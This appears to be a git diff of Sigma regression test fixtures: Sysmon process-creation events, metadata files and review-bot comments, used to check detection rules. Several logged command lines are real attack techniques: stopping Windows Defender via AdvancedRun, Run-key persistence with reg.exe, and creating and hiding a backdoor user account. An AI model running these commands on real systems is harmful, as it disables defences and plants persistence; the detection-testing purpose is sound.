"14207D89-FCFD-68F9-D010-000000003F02", + "ParentProcessId": 3240, + "ParentImage": "C:\\Users\\SWACHC~1\\AppData\\Local\\Temp\\2\\is-F5HMR.tmp\\Advanced_IP_Scanner_2.5.4594.1.tmp", + "ParentCommandLine": 
"\"C:\\Users\\SWACHC~1\\AppData\\Local\\Temp\\2\\is-F5HMR.tmp\\Advanced_IP_Scanner_2.5.4594.1.tmp\" /SL5=\"$E0218,20439558,139776,C:\\Users\\SwachchhandaP\\Downloads\\Advanced_IP_Scanner_2.5.4594.1.exe\"", + "ParentUser": "MIDGARDNET\\SwachchhandaP" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/info.yml b/regression_data/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/info.yml new file mode 100644 index 000000000..bdf211996 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/info.yml @@ -0,0 +1,13 @@ +id: 6629d68a-c1b8-4eb8-bfa6-7dbd5018d922 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: bef37fa2-f205-4a7b-b484-0759bfd5f86f + title: PUA - Advanced IP Scanner Execution +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/bef37fa2-f205-4a7b-b484-0759bfd5f86f.evtx 
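Review bot: the parent process in this sample is the Inno Setup temporary installer (`is-F5HMR.tmp` started with `/SL5=...`), so the fixture captures the post-install auto-launch of `advanced_ip_scanner.exe` rather than a user-initiated run; that is a valid positive case, but the `description: N/A` in the info.yml should be replaced with a sentence stating it, since a rule or tuning that considers ParentImage would treat the installer-launched and user-launched paths differently.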
diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/54773c5f-f1cc-4703-9126-2f797d96a69d.evtx b/regression_data/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/54773c5f-f1cc-4703-9126-2f797d96a69d.evtx new file mode 100644 index 0000000000000000000000000000000000000000..105b6ce24dde429c97602270716133aa52cb14eb GIT binary patch literal 69632
diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/54773c5f-f1cc-4703-9126-2f797d96a69d.json b/regression_data/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/54773c5f-f1cc-4703-9126-2f797d96a69d.json new file mode 100644 index 000000000..50406a429 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/54773c5f-f1cc-4703-9126-2f797d96a69d.json 
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-23T10:11:05.435406Z" + } + }, + "EventRecordID": 650602, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3076, + "ThreadID": 4936 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "srv-01.midgardnet.tech", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-23 10:11:05.414", + "ProcessGuid": "14207D89-FF39-68F9-1A11-000000003F02", + "ProcessId": 7316, + "Image": "C:\\Users\\SWACHC~1\\AppData\\Local\\Temp\\2\\Advanced Port Scanner 2\\advanced_port_scanner.exe", + "FileVersion": "-", + "Description": "Advanced Port Scanner", + "Product": "Advanced Port Scanner", + "Company": "Famatech Corp.", + "OriginalFileName": "advanced_port_scanner.exe", + "CommandLine": "\"C:\\Users\\SWACHC~1\\AppData\\Local\\Temp\\2\\Advanced Port Scanner 2\\advanced_port_scanner.exe\" /portable \"C:/Users/SwachchhandaP/Downloads/\" /lng en_us", + "CurrentDirectory": "C:\\Users\\SWACHC~1\\AppData\\Local\\Temp\\2\\Advanced Port Scanner 2\\", + "User": "MIDGARDNET\\SwachchhandaP", + "LogonGuid": "14207D89-91E6-68F9-0F94-460000000000", + "LogonId": "0x46940f", + "TerminalSessionId": 2, + "IntegrityLevel": "Medium", + "Hashes": "MD5=4FDABE571B66CEEC3448939BFB3FFCD1,SHA256=8B9C7D2554FE315199FAE656448DC193ACCBEC162D4AFFF3F204CE2346507A8A,IMPHASH=31E3E9D3DDE3C0C0F2C167B89B8E269C", + "ParentProcessGuid": "14207D89-FF2E-68F9-1911-000000003F02", + "ParentProcessId": 3972, + "ParentImage": 
"C:\\Users\\SWACHC~1\\AppData\\Local\\Temp\\2\\is-90PLO.tmp\\Advanced_Port_Scanner_2.5.3869.tmp", + "ParentCommandLine": "\"C:\\Users\\SWACHC~1\\AppData\\Local\\Temp\\2\\is-90PLO.tmp\\Advanced_Port_Scanner_2.5.3869.tmp\" /SL5=\"$E0634,19769177,139776,C:\\Users\\SwachchhandaP\\Downloads\\Advanced_Port_Scanner_2.5.3869.exe\"", + "ParentUser": "MIDGARDNET\\SwachchhandaP" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/info.yml b/regression_data/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/info.yml new file mode 100644 index 000000000..2586d9498 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/info.yml @@ -0,0 +1,13 @@ +id: 998b5845-1623-4b2f-b9d1-bfc402172d45 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 54773c5f-f1cc-4703-9126-2f797d96a69d + title: PUA - Advanced Port Scanner Execution +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/54773c5f-f1cc-4703-9126-2f797d96a69d.evtx 
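Review bot: `description: N/A` in the info.yml leaves this test undocumented; a one-line description of what the sample exercises (Advanced Port Scanner started with `/portable` from the installer's temp directory, as the `CommandLine` in the JSON shows) would tell maintainers which part of the rule the single positive match (`match_count: 1`) actually covers. The JSON rendering also carries the capturing user's real account and host (`MIDGARDNET\SwachchhandaP`, `srv-01.midgardnet.tech`); if the rule does not key on the user fields, those could be anonymised before commit without affecting the match.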
diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_advancedrun/d2b749ee-4225-417e-b20e-a8d2193cbb84.evtx b/regression_data/windows/process_creation/proc_creation_win_pua_advancedrun/d2b749ee-4225-417e-b20e-a8d2193cbb84.evtx new file mode 100644 index 0000000000000000000000000000000000000000..1c79d4e63af9ce79a250923cf4cad8091f47ea40 GIT binary patch literal 69632 
diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/fa00b701-44c6-4679-994d-5a18afa8a707.json b/regression_data/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/fa00b701-44c6-4679-994d-5a18afa8a707.json new file mode 100644 index 000000000..441bba366 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/fa00b701-44c6-4679-994d-5a18afa8a707.json 
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-23T10:19:13.088214Z" + } + }, + "EventRecordID": 650834, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3076, + "ThreadID": 4936 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "srv-01.midgardnet.tech", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-23 10:19:13.085", + "ProcessGuid": "14207D89-0121-68FA-6E11-000000003F02", + "ProcessId": 6448, + "Image": "C:\\Users\\SwachchhandaP\\Downloads\\advancedrun-x64\\AdvancedRun.exe", + "FileVersion": "1.51", + "Description": "Run a program with different settings that you choose.", + "Product": "AdvancedRun", + "Company": "NirSoft", + "OriginalFileName": "AdvancedRun.exe", + "CommandLine": "AdvancedRun.exe /EXEFilename \"C:\\Windows\\System32\\sc.exe\" /WindowState 0 /CommandLine \"stop WinDefend\" /StartDirectory \"\" /RunAs 8 /Run", + "CurrentDirectory": "C:\\Users\\SwachchhandaP\\Downloads\\advancedrun-x64\\", + "User": "MIDGARDNET\\SwachchhandaP", + "LogonGuid": "14207D89-91E6-68F9-0F94-460000000000", + "LogonId": "0x46940f", + "TerminalSessionId": 2, + "IntegrityLevel": "Medium", + "Hashes": "MD5=3F44DD7F287DA4A9A1BE82E5178B7DC8,SHA256=E8000766C215B2DF493C0AA0D8FA29FAE04B1D0730AD1E7D7626484DC9D7B225,IMPHASH=65F94FEE8F6FA846B2B29BDD0721C096", + "ParentProcessGuid": "14207D89-00ED-68FA-6611-000000003F02", + "ParentProcessId": 700, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + 
"ParentUser": "MIDGARDNET\\SwachchhandaP" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/info.yml b/regression_data/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/info.yml new file mode 100644 index 000000000..0765e7710 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/info.yml @@ -0,0 +1,13 @@ +id: 0f52b7ec-72e4-4362-acf5-b5558ff58323 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: fa00b701-44c6-4679-994d-5a18afa8a707 + title: PUA - AdvancedRun Suspicious Execution +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/fa00b701-44c6-4679-994d-5a18afa8a707.evtx 
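Review bot: the info.yml again ships `description: N/A`; this sample is the `/RunAs 8` with `sc.exe stop WinDefend` variant, and recording that in the description makes clear which of the rule's conditions the one positive match exercises. Separately, the `proc_creation_win_pua_advancedrun/d2b749ee-4225-417e-b20e-a8d2193cbb84.evtx` added just before this file is, in this diff, not followed by a matching `.json` rendering or `info.yml` (git orders `advancedrun/` before `advancedrun_priv_user/`, so they would appear between the two); unless they already exist in the tree, that evtx is not wired into any regression test.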
diff --git a/regression_data/windows/process_creation/proc_creation_win_reg_add_run_key/de587dce-915e-4218-aac4-835ca6af6f70.evtx b/regression_data/windows/process_creation/proc_creation_win_reg_add_run_key/de587dce-915e-4218-aac4-835ca6af6f70.evtx new file mode 100644 index 0000000000000000000000000000000000000000..374fc336754d067e11aaa5454e6fab5aa0edd962 GIT binary patch literal 69632 
diff --git a/regression_data/windows/process_creation/proc_creation_win_reg_add_run_key/de587dce-915e-4218-aac4-835ca6af6f70.json b/regression_data/windows/process_creation/proc_creation_win_reg_add_run_key/de587dce-915e-4218-aac4-835ca6af6f70.json new file mode 100644 index 000000000..0d846f7a7 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_reg_add_run_key/de587dce-915e-4218-aac4-835ca6af6f70.json 
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-22T20:35:26.043284Z" + } + }, + "EventRecordID": 256890, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3168, + "ThreadID": 4580 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-1", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-22 20:35:26.041", + "ProcessGuid": "5AB40FD1-400E-68F9-6331-000000003B02", + "ProcessId": 6032, + "Image": "C:\\Windows\\System32\\reg.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Registry Console Tool", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "reg.exe", + "CommandLine": "REG ADD \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"softoz\" /t REG_SZ /F /D \"C:\\Users\\admin\\AppData\\Roaming\\sihostt.exe\"", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\", + "User": "AR-WIN-1\\Administrator", + "LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000", + "LogonId": "0x104be4", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "MD5=EB20E119AAF500E2752DC5A588B54C12,SHA256=C6A168C81654F5901E864C8FD61FA54F084CD8B2E0A8AC1B83EACF9EB4484F75,IMPHASH=E23A24F7BA9B35B3E9706724F6749860", + "ParentProcessGuid": "5AB40FD1-3E0C-68F9-1731-000000003B02", + "ParentProcessId": 8252, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": 
"AR-WIN-1\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_reg_add_run_key/info.yml b/regression_data/windows/process_creation/proc_creation_win_reg_add_run_key/info.yml new file mode 100644 index 000000000..c196ea8c7 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_reg_add_run_key/info.yml @@ -0,0 +1,13 @@ +id: e60e5322-dc51-4969-be3b-12caad8a9276 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: de587dce-915e-4218-aac4-835ca6af6f70 + title: Potential Persistence Attempt Via Run Keys Using Reg.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_reg_add_run_key/de587dce-915e-4218-aac4-835ca6af6f70.evtx 
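Review bot: `description: N/A` here too, and the sample only covers the `HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run` path with the `/V`, `/t REG_SZ`, `/F` and `/D` switches; if the rule also matches the HKLM hive or `RunOnce` keys, a second evtx for one of those would give the regression a meaningful second positive rather than a single `match_count: 1` case. Stating in the description that this is the HKCU Run-key variant would at least make the current coverage explicit.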
diff --git a/regression_data/windows/process_creation/proc_creation_win_reg_add_safeboot/d7662ff6-9e97-4596-a61d-9839e32dee8d.evtx b/regression_data/windows/process_creation/proc_creation_win_reg_add_safeboot/d7662ff6-9e97-4596-a61d-9839e32dee8d.evtx new file mode 100644 index 0000000000000000000000000000000000000000..cb3ddab44dbf7889228043aa4ebea30ac8d3ade2 GIT binary patch literal 69632 
z>R+yQ=nU02Y0H)iiQlA;yLzSDQ99nQ@e1R@m@jIBr02$cOV{@pn49q&Z9vS2QHEpR zy96$2F5Z=k=&2I_auKu4LwLCm{+84-RfP+!?AE(@;Y1qe!aFU+v+*`5-j>TVt$4q& zDTKu@Yy{P4Ga1V@;_eo$*&TSF$ROi)(scrGodI`B%xULnJsRWa#P6P{OLgL}`O-D` z#uX^FM1SiHaFJ4FWJMqlS{+K2omw>zVIBUm0am@9g&?dkmuJzh}(L0bn44meo zG$AYkbxDgl#3v0Xyq zFRFk~zA6KZa%fz!mboh2nTg{9l&!$N99t>=&B4A1SMqUZD)5+xJJhQZysrX(%Wo^3Hpe*b}oVTq(yf>6VWxrO=-$eO8V4 z5&I(i<1^J7*QuaY4QN1|h#9}I0M8IZQ)Uj1%kW$wAo6b&&SnBi3I3WgJSxIf;+Yq< z1Lf8ZD5O`8)eba5f~eER4om>2;?F5J#)@z$;S2c%zQe|Ggks@R*i{$ zET**4J>l?)xJbPMR*G>>M>LHRjqJOHU@RUZ&_O0z$hQy}PuU183lbc|Dc;scV|_+$ z#4Ijyb3T`tAc~9l`D9#;#rY&@xE6fd1}rmF7Nfmxu{3pIso6!N|8D8AM008bAZ4o2 z5|I@gyH7vDr`x{w3ge)Lr-GyX#AJC$#RyC8ME<%T*P*W zS#`{ZND}7RoTsTQeLW3-d7ZH(ukoB^mcU~#)}C|$D6t4SQvt8aSd0G@XvF*n^=Z1M zcQdYSe!iq;((fP5`QG<4)fvwX8cVOi6lcEv%jcMWOcw7cc&5aB19TEkEC8%U78Yx0 zEx4xC5patUT_^C0VZ%FohQE2hpVqqyC1T%0?4!T?(v@N!`4FDzWCVcUdzWndOXbr~ z+dT5SZoGaK^T=+w7(O7mn2|VUP;CNj2n&uR7gLHe2Hi`szXmP{DGK#z1m5;HTOdwY z{@BM~zf`H&Pd~Ks0sTH;g}q>=>@&xlopH0bW#{JJR6AehC>1AE1-ZjhP z_MW5L?K5tk`b>WlJttGQNB%GrrNx?rFHd%r5e`BcS^gut4RoE#>N5#2iZzxz@p=EZ3HS&V+Bi z9>q1bcj6$sn+$AkwEoW_qxHKTS}*d)JU@T!k%OPlz{^1(^$0eRQy*!)L~HasYoY05 zvC;4)^E~5me<3#UJe4?Js$+acoQvS~mf?I2Y9fsNStG5%aXmOX8CxT^0>ELtwG3DC zu*K)G3T(3tBNh73i1uCd%*=glz_YA>FkWZ|#v8i$FE-3M{TI_zJ@;Qrfz=vdG6$Y? zI=*Tt-a`LnuAA>6hTmYhR!0YdQ>qsk%uU)b zdZR&4DWgG7zbOzkc*h^nAi>N>8szkwP7N9b0@7zX{bq75^|hvmtWuNM7SQEKIibAF zhHJUd%FCsvo$jH$JQp(Z;hU z+D)F?+8S8LWyfG^O}V$Zt);Y5Z^Yhiv-)#cyO;X&a~FFn5R>VTVCEzJaoSs_{&;V1 zd#5MeT3W*!vA5?#Znj%_dFanS_R!vj!d>mHKy;Ir&!HA0nE6Ovoc4Ab>@6c(iEyQ! 
z%V>5YuCs2-_PXWzIF?&sOGl;7NwBjRGZ;-cXB$hq&Khn<6xRl8xlxyi;40fIBZ%{u zbz}ZR+M45^N{oK_)EXND7Jvtgf0^s%yCj}eYJC?=eC$~pw$>FRZcLuLS)yS&@i&>* zR(z>57VcUu`FFa1$t=|9j-6I)(@Yj6A4A@VdPRG@61sJf)vqtj9s7Z<`Gi!(zi+zO zV}Y1VzXUTM>6gqrkF!PaIIqmjJD@Sg2d#aT$_K7%49~-+(S*!#P z>rm%jh+6k5*kIT6*+0*jLjBs2+B4GPY*enMSmvGF#DX>(|Thrb?W% zRaj{s5PL3WncFI*!rBbUi zJ9)@CFiUYXOWa=?&M($K>LK;|*ByqF^O^(MQ3|NBZcr^G%G5r+c$L%Q}l#}z37u#v&P;8>nyUJi zTYG~*Or}GEnU8eH>4%*<MF`2vwW@i>Lg*hxXR3y+I%*(;vaiNBZNmw@&@> z-rll~-*Y|b*3uexFZT9)$j#+eUY^S*{+oH(X)$>%2P_d#GP-?F|C)tfwFT@xrG=>PLG2 zbV&3|F!PaqIqk7izuqqG4acrWZ@InUN-I}6^Un8BuH4!i1frW<4M)CAF!PaIIqkMH zze)S;Y$r~2djm&pHlkgDS>qx-$oN4NF{ zftXAm1v4M%qtnhi^)XfL4XM<-9<(?74Dt2{t(=T}_6OT0y)5Haq`e_k@%9#%c4C2e z@0{5%%#7+>o9Wgfh+;*z}K;5oMZ?X2{f8780_*Zgv&A#*9U%hhwpAH^O)p)E$ zXaQ!Q^Cjrnv<9u=i-A))_U!15AvP{w9UHmL5r+n2&JATSR;Zb>Clp8Y^IkKet4_STw zW#j=5_4$`B?aTr(nLZ0`&yzz5di&5faB<@-2rTD_2>0`RK~x zb071}{$C$5{X6%CsO0)LTOb~J=7iZ7dyVn_%W6dFeduk~dZ_QHo9VJZ`z| z=XED8Uh}iDo39xDB)-ayH~$F^Q#0Ot3f{zV!QGA?55;EwVR?@0v!jCt!{%}<>{|3g zq8;T(b3IP_RQv9uj5!{Jl4;suQ#IdySP|LLt5eaBwn z9NPbnSb4d7+|?D|f5oeM?u9P(T!ARO^E_B~&S6E%&w6e-&a18cuh3S%4EDZQdxv~&`&nM>e<@1j56F6MVO&j@wN;M6 zW_^-lb4*>fQPXE8EdN?ikkl*FUVulWEc=xg;$8t_z9u~1u(r9J0p zp$1T;3A7^(NT~>@!1@vAcBG|eJ&H3ha`woX$V$=+aOO#R%2;mlZJOzH+W(JQeLio@ zN)Pqf&Hf9-WcnnRvLsrkZ z=C%E`V^w6_F0^rc9r`bry(9Ra%KXqV^Ph3U9?Snf{NYO;^4~50FAzsPy8F|Hpb7yo38We9Y=|_PQ^7sLyWkzd%f;&w`nc^f`6$fB)&NBkq?&XZ-)4 zR$f|ecx3OGfA*#S7l=|{Y~Od~+%>@F+wlLLm?B*;^O3ytKK@UoeDuiwf86r_`V(LE zkpFJ}Umzy(pOvTe*aR~l@xL$pe;#~2SNthKR*x+h>?J7eKb-xh9M|R`!^f;2GhNl# zOb*bjWx{@ZWr6<(RR(1H{|#23zq{Q_eRlKz0x_9B3uZpj=T!Rt{?c1<`i{NR|9`^D zOV&4To^n^ZbDdvy)=O1Ccenb#Kooh&y|!W{XUU1c|JP&T2f@ro^72;vf9m9;NB;kl zmj5?B^AivG@8XJD5xWdo^%{2GhTROJQ@pmP*74Y&GO+YXh;E@eeJ)7* zk%#*1=Klp^GJO`ze5B8*^Z)&)x8n32d#C@u$;!)~+tX_IW%Z^17l={+zwm*w7h(5D zqyNvf$15e6`AA-R@BdRNA3gH_pAr7wJJUn{yZQe;7Gfg*ng8e9xq_LG`0u^{=ez|a z_{V;}T%DZb_qm=p>-t6T>*gA3|D5Z9*Ji@wv*n+C12~#L5BuW4|AR6EGXH<9~ITZiD4ZW;BYvpC{3-$l=@<^}z|GQnr{|UrH 
zzj^t0T&?^74L^R|O+_3anE6Ovoc8|%7}qz}j{Z-a$9J|K^Jmtv;(Qr0{_i>**V(l| z%CW{h*VtZ;IS5)YtII}=QmDhcDGivPrUMP+W{vK7IOmLzT-T`sYp))yH0M;=s^8XO z-y<1QrFNZnR$cqy$8&B-R|ghv|LxaOHLHz*XRznoF!A`W(KFM;)=YJ;ynNA{ggajE(Eaa2&W9HzQ*O^Fi-sTw4nYN3^Hq_`nieEx~oO zXU&>(2AzsKUH|c&@=v2gePh4tT7CO~JM~WH zqA@xq>sy(%cKTPpoN^jHrd&wB{LfqY`1Ys%^yi1idS#d0+GPcz`0@6%!*vsZ&27lb z{td=iF!Pao^uAt}O26Hsdf68&|Lt+9C_4#+Bj`L8T-RflmF_}IKW%zLvKi7YH8}<6J1F4rO$jUw| zFSnH+eyMY6U;2N67?qcag%>`F`q*Ch|Fg1VnE6Ovdhh>JDIY!Z|6jEHzw^TS%*&R-%kzjmuFYJlrVM*%b8Z68OH27G z)e!(^>IwQ~4cPf-zhw1!R?$fw>a&~w7l_I9SupdFKBvzA_n+Rz+HoiM<>i#Y zZ;l?B-84{`oCc2BmR5u{|l_QuY@mW3oU1xW1l|b{|nJt%UZwj|7@$}JbmoRRf!0IbJBAz zSN7}<>i+|@UG^(hpFa_LkB9o~=Klp^GJO`ze5B8*^Z)&)w^6SjJ8=5{TdchN_wc*N z-CWR@{$C)9yqrJ#8zmn`{XY%;vi6TtN-*=0y!77xr&2z8YUlGMHIsh-XwLV(pQ+AxZqQg~ zDZ}AO*xiqQZsrVs$!GTWcozHHEx-3&^c@fReYs12Ab}`LCO(lDiQ~6m=2L#341RMR zaIV6WiM_ND%8EQre$R)`PUJOLT8{OTOXTu$^k9ob8JciFzLLMMWB)bF-4qx_%4_Yc)qiL=_d4&HN1`Id;GoRe2*_Dj851K-)Ezr z=N*>sV`sf~#5@1}T*#~+x7*>r1!4kn+J7H_6Bo>U#CK=??GotvXshpu>pt_GcKv+p zjZZi0hfc=%4%Ee(Q0H0;dtHp088fq{7jL7kqc!3xGqcRmHs}m4XNYGOmviZ}-o~E6 ze8*1MjvCmB<>-YSQSan^H%~*VS$@~7+^w8_Ss7E{M zE-XwbnE6PKdY?y4Wj(t`dDOct|8IP8;y1nHzgr$vASUvk_2|8@bb^_W`0wqpHtP_q^S*W~8>7M#bTTIWoQaLo0(O+RYRXhCnye$#BFr$^){YL0>}3i7C+!GP>X zeUH`WnthWz)MvLmsz6Mp&w`nc^w}8~IQ3a_B+j_tXsfXAfPVIu-p0FreI|KS`u}^a zyxf~rchUnDed+%NVj_ai!vAMtp=rU)NAl8p|DQ_v=#l^bhUNcLlP~g+|8D+YASUvk z{(mfLXo8uK`0u^{=Umnt4@FHh^{B7!FmMO!M?w-C&HBrm=9|EZLZ9{K-oS^nR8&m0f=@8Ix6_+0Fk8#ANy`nE6PbQ|JHtPj3_5tM&gbmxD_I1p*2L z6bL8~P#~Z{K!Jb)0R;jI1QZA;5KthXKtO?j0s#dA3Ir4gC=gH}pg=%@fC2#p0ty5a V2q+LxAfP}%fq()51qM6?{tc%{2RQ%$ literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/9ec9fb1b-e059-4489-9642-f270c207923d.json b/regression_data/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/9ec9fb1b-e059-4489-9642-f270c207923d.json new file mode 100644 index 000000000..0ddd2e498 --- /dev/null 
+++ b/regression_data/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/9ec9fb1b-e059-4489-9642-f270c207923d.json 
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-31T05:06:45.367278Z" + } + }, + "EventRecordID": 657153, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3080, + "ThreadID": 4948 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "srv-01.midgardnet.tech", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-31 05:06:45.364", + "ProcessGuid": "14207D89-43E5-6904-4506-000000004002", + "ProcessId": 5244, + "Image": "C:\\Windows\\System32\\reg.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Registry Console Tool", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "reg.exe", + "CommandLine": "REG ADD \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" /v AtomicOperator$ /t REG_DWORD /d 0", + "CurrentDirectory": "C:\\Users\\SWACHC~1\\AppData\\Local\\Temp\\", + "User": "MIDGARDNET\\SwachchhandaP", + "LogonGuid": "14207D89-34DD-6904-8287-190000000000", + "LogonId": "0x198782", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "MD5=EB20E119AAF500E2752DC5A588B54C12,SHA256=C6A168C81654F5901E864C8FD61FA54F084CD8B2E0A8AC1B83EACF9EB4484F75,IMPHASH=E23A24F7BA9B35B3E9706724F6749860", + "ParentProcessGuid": "14207D89-43E5-6904-4106-000000004002", + "ParentProcessId": 6656, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"cmd.exe\" /c NET USER AtomicOperator$ At0micRedTeam! 
/ADD /expires:never & REG ADD \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" /v AtomicOperator$ /t REG_DWORD /d 0", + "ParentUser": "MIDGARDNET\\SwachchhandaP" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/info.yml b/regression_data/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/info.yml new file mode 100644 index 000000000..8b2a1c592 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/info.yml @@ -0,0 +1,13 @@ +id: de8dc72e-19eb-465a-83ac-59545ae56426 +description: N/A +date: 2025-10-31 +author: SigmaHQ Team +rule_metadata: + - id: 9ec9fb1b-e059-4489-9642-f270c207923d + title: Hiding User Account Via SpecialAccounts Registry Key - CommandLine +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/9ec9fb1b-e059-4489-9642-f270c207923d.evtx 
